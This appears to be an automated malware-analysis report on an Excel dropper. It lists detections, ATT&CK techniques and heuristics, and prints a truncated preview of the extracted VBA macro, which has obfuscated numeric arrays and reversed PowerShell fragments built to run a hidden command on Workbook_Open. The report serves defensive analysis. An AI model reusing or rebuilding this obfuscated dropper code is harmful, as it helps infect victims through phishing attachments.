MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and exhibits critical heuristics for VBA macros, specifically a Workbook_Open event that calls the Shell() function. This indicates the macro is designed to execute an external command, likely to download and run a secondary payload. The presence of a Workbook_Open macro and the Shell() call strongly suggests a dropper functionality, commonly delivered via spearphishing attachments.
Heuristics 5
-
ClamAV: Xls.Dropper.Rvaj-6855468-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Rvaj-6855468-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8869 bytes |
SHA-256: 274c0ee79cd159fe5da8a88e31fc9f2a9936afb0bcc1f534eea886337299e77d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function dWindow()
Filters = ", 101, 56,801 , 501 , 101, 011,611, 93,93, 14,14 , 64 , 43 , 97, 089,76,84 , 521, 321, 94 ,521, 321, 05 ,521,43, 54,201, 23, 93 , 93, 66,121, 611 , 101,93, 93 , 44 ,93 , 93, 8 , 69, 501 ,521,44, 93 ,93,19 ,93, 93 , 44 , 93,93 ,411,101 ,93 , 93 , 14, 23 , 04,43 , 321 ,801 ,43 ,04 ,63, 321 , 18 , 69 , 501 ,021, 69 , 101,8 ,521,64,43,301,96 , 611 , 086 , 69,58,521 ,16,63 , 321 ,8,69 ,484, 64 ,64 ,05 ,94 , 75, 14, 14,321, 63 ,321,984, 64 , 64 , 05, 25,14 , 421, 64, 04,93 ,93 , 73 ,93 ,93 , 14, 321 ,201,111, 411, 101 , 79 , 99,401 ,04,63 , 321 ,311,69,37 , 521 , 23,501,011, 04, 84,95,04 ,84 , 84 ,521 ,321 ,94 ,521 ,43, 54, 201 , 93 ,93 , 37,93,93,44,93 , 93 ,39 ,93,93,14 , 23 ,35, 35,83, 04 ,43,321 ,89 , 79 ,011, 001, 23, 94,35, 14 , 14 , 521 , 521 , 95 ,8,521,64 ,43, 301 ,43 ,23,54,89,111 , 411 , 04,63,321 , 121,489,79 , 011, 001,94 ,35 ,14 , 24, 94 , 45, 14 ,54, 8 , 521, 64,43 ,66,43 , 54 , 8,43 , 04, 04,63 ,321,121,69,485 , 43 , 07,6"
errorcheck = "7 ,69 , 97,111,285, 84 ,34, 63,321 ,311 ,501 ,521, 39 ,16,04 , 19, 901, 79 ,611 ,401,39,89 , 411 ,101 ,79 ,701 , 521 ,521, 44 ,63 ,321 , 59 , 521, 14 ,95, 63 ,321,96 ,521, 19 , 63 ,321 ,59 ,521, 24 , 05,05 , 84 , 64 ,64 , 35 ,15 , 94 , 45, 39 ,14,14,95,87 ,301,43 ,04 , 63,321,96,521,19 , 8, 37 , 69 , 8, 28,511,48 , 76,69 , 501, 501, 43 ,64 , 43 , 301 , 69, 101 ,485, 43 , 79, 385 ,8 ,101 , 021 , 611 , 64 ,96 , 011 , 99, 111,001 , 501 ,011 ,301 , 39,8 , 121,511 , 611, 101 , 901 ,64 ,48 ,93,93,14, 04, 19 ,38801 ,211, 511, 54,23, 93,93 ,93, 96 , 8,97 ,76,43 , 64 , 521 ,99 ,411,321, 63, 04, 54,64, 64 , 94, 54, 19 ,521, 76, 411 , 321, 63 ,23 , 16, 23, 521 ,201,07 , 69, 96,321 ,63 ,95, 43,44 , 43 ,23 , 611, 501 , 87 , 69,58,801 ,43, 64 , 521,07,07,69, 101, 321, 63 , 04, 54,64,64,94, 54,19,521,07 , 07 ,69 ,101 , 321,63,16, 521,111, 67 ,321 , 63 , 95,43 ,44 , 43, 23 ,011 ,501 , 111 , 601 , 54 ,23 , 39 , 14,43 ,487 ,101 ,83 , 95 , 43 , 43 ,23, 01"
verificationsring = "1 ,501 , 111 , 601, 54,23 ,39 , 14,43, 27, 611 , 301 , 69 ,84,321,43 , 04, 801 , 321 ,63 , 04, 14 ,93 , 021 , 93 ,44,93 , 101, 501 ,93 ,23 ,201 ,54,23 ,43,521,94 ,321 ,521, 8 ) ) )14 ,521 , 97 ,' -sp" + HelpVisual
dWindow = Filters + errorcheck + verificationsring
End Function
Function Reports()
Reports = FindCtrl + "21,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' (""nIo`j""::]GnIRTs[()''''nIOJ-''x''+]3,1[)(""gni`R`tSoT"".}ECNerE`F`ErPEsoB`rEV{$ ( . 83,04, 43 ,321, 84 , 521,43,54 ,201, 23 , 93, 93 ,101,401 ,93,93, 44 ,801,93,93,14 , 23 , 04,43 ,321 , 94 , 521,321 , 84 , 521 , 43 , 23,54 , 201, 93 ,93 , 99 ,611 ,93,93 , 44 , 93, 93,79,8 , 121 , 211 ,101, 93 , 93 ,44, 93 ,93 ,601 ,101,93,93 ,44 , 93,93 ,411 , 93, 93,14, 23,04 , 43 , 321, 05 , 521 ,321,94,521 ,321 ,84 , 521, 43 , 23 ,54,201 , 93, 93 ,54,489,93,93 ,14, 95 , 64, 04 , 43 ,321, 94 , 521 , 321 ,05, 521, 321,87, 101,911 ,54, 97,86 ,93,93 ,44 ,93 , 93 , 56, 001,93,93,44 , 93,93 ,84, 521, 321,94,521 , 43,23 , 54 ,201, 93 ,93 ,64, 87, 79 ,901 , 101 , 23, 04, 43, 321,05 , 521, 321, 801 ,121,89 , 86,93,93,44,93, 93 , 411 ,79 , 911 ,501 ,011, 301 ,93 , 93 , 44 , 93, 93,001 ,93 , 93 , 14 ,23,54,56 ,511 ,511, 101, 901,84 , 521 ,321 ,45, 52"
End Function
Function LeftAnd()
PrintPAges = "1,43 ,54, 201 ,23 , 93 , 93 , 8 ,521 , 16 , 04,04 , 43, 321 , 05, 521 , 321,25 ,521,321 ,94, 521, 321, 15,521, 321,35,521,321 ,8,69 , 38 ,121 ,511 ,611,101,901,93 , 93 , 14 ,95 ,63,321 , 485,93 ,93 ,44 ,93, 93 ,711,411 ,64 , 99, 111, 901 , 74,93,93 ,44 , 93 , 93,401,611,611 , 211 , 511, 93,93 , 44,93, 93, 74,74 ,501,64,501 ,901,301, 93 ,93, 44,93 ,93, 38 , 93 ,93 , 44, 93, 93 ,8 ,511, 984, 98 , 76,84,521,321,45, 521, 321,65 ,521 ,43 , 23 ,54, 201,23 , 93, 93 ,311,67 ,93, 93 ,44,93,93 , 64, 211 ,011, 301,93, 93,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.